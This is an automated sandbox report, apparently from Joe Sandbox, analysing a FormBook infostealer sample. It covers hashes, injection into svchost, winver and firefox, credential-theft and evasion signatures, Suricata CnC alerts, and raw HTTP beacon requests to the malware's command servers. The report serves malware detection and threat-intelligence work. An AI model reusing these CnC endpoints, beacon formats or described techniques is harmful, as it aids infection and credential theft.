Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z6tNjJC614.exe

Overview

General Information

Sample name:z6tNjJC614.exe
renamed because original name is a hash value
Original sample name:2d6f1128b6b15116c20d67315344e79aaece8d0a636f2ddae9936b1949188dde.exe
Analysis ID:1588990
MD5:043a47d412717c236558774c700bb159
SHA1:bb9aada716669988693a17d9c559e683b194a5d1
SHA256:2d6f1128b6b15116c20d67315344e79aaece8d0a636f2ddae9936b1949188dde
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • z6tNjJC614.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\z6tNjJC614.exe" MD5: 043A47D412717C236558774C700BB159)
    • svchost.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\z6tNjJC614.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • tFEgkRNveR.exe (PID: 6908 cmdline: "C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winver.exe (PID: 7628 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)
          • firefox.exe (PID: 7828 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              8.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Process Parents
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files\Mozilla Firefox\Firefox.exe", CommandLine: "C:\Program Files\Mozilla Firefox\Firefox.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Mozilla Firefox\firefox.exe, NewProcessName: C:\Program Files\Mozilla Firefox\firefox.exe, OriginalFileName: C:\Program Files\Mozilla Firefox\firefox.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 7628, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files\Mozilla Firefox\Firefox.exe", ProcessId: 7828, ProcessName: firefox.exe
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\z6tNjJC614.exe", CommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", ParentImage: C:\Users\user\Desktop\z6tNjJC614.exe, ParentProcessId: 7128, ParentProcessName: z6tNjJC614.exe, ProcessCommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", ProcessId: 7304, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\z6tNjJC614.exe", CommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", ParentImage: C:\Users\user\Desktop\z6tNjJC614.exe, ParentProcessId: 7128, ParentProcessName: z6tNjJC614.exe, ProcessCommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", ProcessId: 7304, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T08:16:42.756658+010028554651A Network Trojan was detected192.168.2.749972154.205.156.2680TCP
                2025-01-11T08:17:07.189292+010028554651A Network Trojan was detected192.168.2.74997747.76.213.19780TCP
                2025-01-11T08:17:20.955304+010028554651A Network Trojan was detected192.168.2.74998174.48.143.8280TCP
                2025-01-11T08:17:34.104111+010028554651A Network Trojan was detected192.168.2.74998513.248.169.4880TCP
                2025-01-11T08:17:48.016406+010028554651A Network Trojan was detected192.168.2.749989103.21.221.8780TCP
                2025-01-11T08:18:02.476469+010028554651A Network Trojan was detected192.168.2.7499938.218.14.12080TCP
                2025-01-11T08:18:15.759713+010028554651A Network Trojan was detected192.168.2.749997203.161.43.22880TCP
                2025-01-11T08:18:28.913120+010028554651A Network Trojan was detected192.168.2.75000113.248.169.4880TCP
                2025-01-11T08:18:42.699338+010028554651A Network Trojan was detected192.168.2.750005147.255.21.18780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T08:15:40.434176+010028554641A Network Trojan was detected192.168.2.750008104.21.42.7780TCP
                2025-01-11T08:16:59.497328+010028554641A Network Trojan was detected192.168.2.74997347.76.213.19780TCP
                2025-01-11T08:17:02.081515+010028554641A Network Trojan was detected192.168.2.74997447.76.213.19780TCP
                2025-01-11T08:17:04.638978+010028554641A Network Trojan was detected192.168.2.74997647.76.213.19780TCP
                2025-01-11T08:17:13.306462+010028554641A Network Trojan was detected192.168.2.74997874.48.143.8280TCP
                2025-01-11T08:17:15.868025+010028554641A Network Trojan was detected192.168.2.74997974.48.143.8280TCP
                2025-01-11T08:17:18.395884+010028554641A Network Trojan was detected192.168.2.74998074.48.143.8280TCP
                2025-01-11T08:17:26.456079+010028554641A Network Trojan was detected192.168.2.74998213.248.169.4880TCP
                2025-01-11T08:17:29.005833+010028554641A Network Trojan was detected192.168.2.74998313.248.169.4880TCP
                2025-01-11T08:17:31.571928+010028554641A Network Trojan was detected192.168.2.74998413.248.169.4880TCP
                2025-01-11T08:17:40.319273+010028554641A Network Trojan was detected192.168.2.749986103.21.221.8780TCP
                2025-01-11T08:17:42.840779+010028554641A Network Trojan was detected192.168.2.749987103.21.221.8780TCP
                2025-01-11T08:17:45.392008+010028554641A Network Trojan was detected192.168.2.749988103.21.221.8780TCP
                2025-01-11T08:17:54.627543+010028554641A Network Trojan was detected192.168.2.7499908.218.14.12080TCP
                2025-01-11T08:17:57.228314+010028554641A Network Trojan was detected192.168.2.7499918.218.14.12080TCP
                2025-01-11T08:17:59.919440+010028554641A Network Trojan was detected192.168.2.7499928.218.14.12080TCP
                2025-01-11T08:18:08.097844+010028554641A Network Trojan was detected192.168.2.749994203.161.43.22880TCP
                2025-01-11T08:18:10.670064+010028554641A Network Trojan was detected192.168.2.749995203.161.43.22880TCP
                2025-01-11T08:18:13.227092+010028554641A Network Trojan was detected192.168.2.749996203.161.43.22880TCP
                2025-01-11T08:18:21.267075+010028554641A Network Trojan was detected192.168.2.74999813.248.169.4880TCP
                2025-01-11T08:18:23.809027+010028554641A Network Trojan was detected192.168.2.74999913.248.169.4880TCP
                2025-01-11T08:18:26.381532+010028554641A Network Trojan was detected192.168.2.75000013.248.169.4880TCP
                2025-01-11T08:18:35.081560+010028554641A Network Trojan was detected192.168.2.750002147.255.21.18780TCP
                2025-01-11T08:18:37.633844+010028554641A Network Trojan was detected192.168.2.750003147.255.21.18780TCP
                2025-01-11T08:18:40.173449+010028554641A Network Trojan was detected192.168.2.750004147.255.21.18780TCP
                2025-01-11T08:18:49.281777+010028554641A Network Trojan was detected192.168.2.750006104.21.42.7780TCP
                2025-01-11T08:18:51.841588+010028554641A Network Trojan was detected192.168.2.750007104.21.42.7780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: z6tNjJC614.exeReversingLabs: Detection: 83%
                Source: z6tNjJC614.exeVirustotal: Detection: 66%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127852915.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635105463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3124391485.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: z6tNjJC614.exeJoe Sandbox ML: detected
                Source: z6tNjJC614.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winver.pdb source: svchost.exe, 00000008.00000003.1603996002.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1603347613.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000003.1707352600.0000000000DAF000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tFEgkRNveR.exe, 0000000B.00000002.3124395582.000000000017E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: z6tNjJC614.exe, 00000000.00000003.1297611024.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, z6tNjJC614.exe, 00000000.00000003.1296227096.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1538115679.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1536377388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1635461967.0000000004154000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.000000000464E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1638229083.0000000004304000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: z6tNjJC614.exe, 00000000.00000003.1297611024.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, z6tNjJC614.exe, 00000000.00000003.1296227096.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000003.1538115679.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1536377388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, winver.exe, 0000000C.00000002.3128325549.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1635461967.0000000004154000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.000000000464E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1638229083.0000000004304000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000008.00000003.1603996002.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1603347613.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000003.1707352600.0000000000DAF000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0057445A
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057C6D1 FindFirstFileW,FindClose,0_2_0057C6D1
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0057C75C
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0057EF95
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0057F0F2
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0057F3F3
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005737EF
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00573B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00573B12
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0057BCBC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004AC740 FindFirstFileW,FindNextFileW,FindClose,12_2_004AC740
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 4x nop then pop edi11_2_086F8AEE
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 4x nop then pop edi11_2_086FAAFC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 4x nop then xor eax, eax11_2_086FE309
                Source: C:\Windows\SysWOW64\winver.exeCode function: 4x nop then xor eax, eax12_2_00499E10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 4x nop then mov ebx, 00000004h12_2_042904E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49977 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49973 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 8.218.14.120:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49997 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49972 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 8.218.14.120:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49985 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 8.218.14.120:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50007 -> 104.21.42.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50004 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50003 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49989 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50001 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49981 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 104.21.42.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49993 -> 8.218.14.120:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50005 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50008 -> 104.21.42.77:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.fortevision.xyz
                Source: DNS query: www.rtpterbaruwaktu3.xyz
                Source: DNS query: www.tals.xyz
                Source: Joe Sandbox ViewIP Address: 203.161.43.228 203.161.43.228
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_005822EE
                Source: global trafficHTTP traffic detected: GET /z9pi/?QbUPL=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipuFwHgdvcemFSrMC8OxCAm29CGPtG+jrBp7iHLTW/uD4KAmAXSCgHgFK4&ef4=TJYXELnhFJhl HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8qt7/?QbUPL=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXiJxWYm89PNrsVDefynVEbypj6mz/ajpHDG/8Uzc6QbTSEQ6i7rwMVRjg&ef4=TJYXELnhFJhl HTTP/1.1Host: www.ytsd88.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mlxg/?QbUPL=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGraedJXjbbCkeYoQqBrGkjzfTHxGy2G2a4+AXnGm9DtiGGRVBQ2NqOGZfd&ef4=TJYXELnhFJhl HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dash/?ef4=TJYXELnhFJhl&QbUPL=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q1LAgUq3XcZwqztHS/MhxxHRy56C3xMKSUemxfPW4qvYN+c3Gdt63iP8z HTTP/1.1Host: www.fortevision.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
